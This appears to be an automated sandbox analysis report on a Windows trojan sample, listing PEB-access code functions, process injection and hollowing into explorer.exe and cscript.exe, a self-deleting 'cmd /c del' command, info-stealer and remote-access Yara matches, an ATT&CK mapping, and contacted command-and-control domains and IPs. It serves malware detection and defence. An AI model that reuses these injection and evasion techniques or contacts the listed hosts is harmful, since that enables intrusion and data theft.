          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01810445 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01810445 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01810445 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01810445 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01880443 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0183D450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0183D450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0180D454 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0180D454 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0180D454 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0180D454 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0180D454 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0180D454 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182E45E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182E45E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182E45E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182E45E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182E45E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018CA464 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01808470 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01808470 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018BF478 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018DB781 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018DB781 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01831796 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01831796 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0187E79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0187E79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0187E79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0187E79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0187E79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0187E79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0187E79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0187E79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0187E79D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FF75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FF75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FF75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FF75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FF75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FF75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FF75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FF75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FF75B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018007A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018CD7A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018CD7A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018CD7A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018D17BC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018BF7CF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182E7E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018037E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018037E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018037E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018037E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018037E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018037E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018037E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018077F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018077F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FB705 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FB705 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FB705 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FB705 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0180D700 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018C970B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018C970B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182270D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182270D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182270D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0180471B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0180471B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018BF717 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01829723 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01833740 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0188174B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 7_2_0040647E GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 7_2_0040DCAA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe; Network Connect: 103.224.212.213 80
          Source: C:\Windows\explorer.exe; Network Connect: 172.67.182.124 80
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Memory written: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Section loaded: NULL target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Section loaded: NULL target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exe; Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cscript.exe; Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Thread register set: target process: 5272
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Thread register set: target process: 5272
          Source: C:\Windows\SysWOW64\cscript.exe; Thread register set: target process: 5272
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 400000
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Process created: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe "C:\Users\user\Desktop\yPURXYpFVuXra2o.exe"
          Source: C:\Windows\SysWOW64\cscript.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\yPURXYpFVuXra2o.exe"
          Source: explorer.exe, 00000006.00000000.30294425898.0000000000CD0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.35220149293.0000000000CD0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.30294425898.0000000000CD0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000003.31964592682.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.00000000090AA000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.30294425898.0000000000CD0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.35220149293.0000000000CD0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.35219414673.0000000000618000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30293904309.0000000000618000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: 0Progman
          Source: explorer.exe, 00000006.00000000.30294425898.0000000000CD0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.35220149293.0000000000CD0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 7_2_0040AADC GetUserDefaultLCID,FreeLibrary,GetLocaleInfoA,LoadStringA,GetModuleFileNameA,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,sprintf_s,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,GetUserDefaultLCID,GetLocaleInfoA,sprintf_s,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 7_2_00417E85 GetLocaleInfoW,wcsncmp
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 7_2_0040AB35 GetLocaleInfoW
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Queries volume information: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe VolumeInformation
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 7_2_0040DC00 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 7_2_00407490 RegOpenKeyExW,RegOpenKeyExW,SysFreeString,RegCloseKey,RegCloseKey,WideCharToMultiByte,WideCharToMultiByte,RegOpenKeyExA,GetLastError,RegisterEventSourceW,GetUserNameW,LookupAccountNameW,LookupAccountNameW,ReportEventW,DeregisterEventSource
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 7_2_0040A9C0 InitializeCriticalSection,GetVersionExA
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match; File source: 5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.2.yPURXYpFVuXra2o.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match; File source: 5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.2.yPURXYpFVuXra2o.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 7_2_00415880 CreateBindCtx,MkParseDisplayName
          Source: C:\Windows\SysWOW64\cscript.exe; Code function: 7_2_0040CD6C CoCreateInstance,CoCreateInstance,GetUserDefaultLCID,CoGetClassObject,CreateBindCtx
MITRE ATT&CK Matrix (techniques per tactic; the number in parentheses is the count of matching signatures, techniques without a number were not observed):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Native API (1); Shared Modules (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Process Injection (612); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (41); Process Injection (612); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (4); Software Packing (12); DLL Side-Loading (1); HTML Smuggling
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (1); Security Software Discovery (31); Process Discovery (2); Virtualization/Sandbox Evasion (41); Application Window Discovery (1); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (24)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph ID: 1450804, Sample: yPURXYpFVuXra2o.exe, Startdate: 03/06/2024, Architecture: WINDOWS, Score: 100

Start node: contacts www.winningpickleballshots.com, www.warehouse-inventory-80963.bond and 24 other IPs or domains; signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 7 other signatures
  yPURXYpFVuXra2o.exe (started) - Injects a PE file into a foreign processes
    yPURXYpFVuXra2o.exe (started) - Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      explorer.exe (injected) - connects to www.bolinkpass.club 103.224.212.213 (ports 50410, 80; TRELLIAN-AS-AP Trellian Pty Limited AU, Australia) and www.spiritualpath.info 172.67.182.124 (ports 50411, 80; CLOUDFLARENET US, United States); System process connects to network (likely due to code injection or exploit)
        cscript.exe (started) - Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process
          cmd.exe (started)
            conhost.exe (started)

Source | Detection | Scanner | Label | Link
yPURXYpFVuXra2o.exe | 32% | ReversingLabs | ByteCode-MSIL.Trojan.Swotter |
yPURXYpFVuXra2o.exe | 34% | Virustotal | | Browse
yPURXYpFVuXra2o.exe | 100% | Joe Sandbox ML | |
          No Antivirus matches
          No Antivirus matches
Name | Malicious | Antivirus Detection | Reputation
www.spiritualpath.info/cr12/ | true | | unknown
                                                                                                            unknown
                                                                                                            https://ntp.msn.com/edge/ntp?cm=en-us&ocid=widgetonlockscreenwin10&cvid=f49d9883-4f80-4b3c-a960-1e7cexplorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://www.msn.com/en-us/weather/hourlyforecast/in-Atlanta%2CGeorgia?loc=eyJsIjoiQXRsYW50YSIsInIiOiexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://www.henslotalt.usexplorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://www.tiktok.com/explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://www.footresort.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://outlook.compexplorer.exe, 00000006.00000003.31958579029.0000000004CBB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30296440713.0000000004CC2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35223272761.0000000004CC2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://www.free-cell-phones-en-arena.sbs/cr12/explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://www.sugardefender24-usa.usexplorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://outlook.combexplorer.exe, 00000006.00000003.31967028878.000000000CA4B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.32856007373.000000000CA62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959277689.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35230740761.000000000CA4C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://metacritic.com/explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://www.pedandmore.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://www.lotusluxecandle.com/cr12/www.carneden.comexplorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://www.winningpickleballshots.comReferer:explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://www.ptwix.xyzReferer:explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://www.nff1291.com/cr12/explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://stacker.com/explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://www.65302.vip/cr12/explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-darkexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://www.henslotalt.us/cr12/explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMd4explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://www.veryaroma.com/cr12/explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://www.henslotalt.usReferer:explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
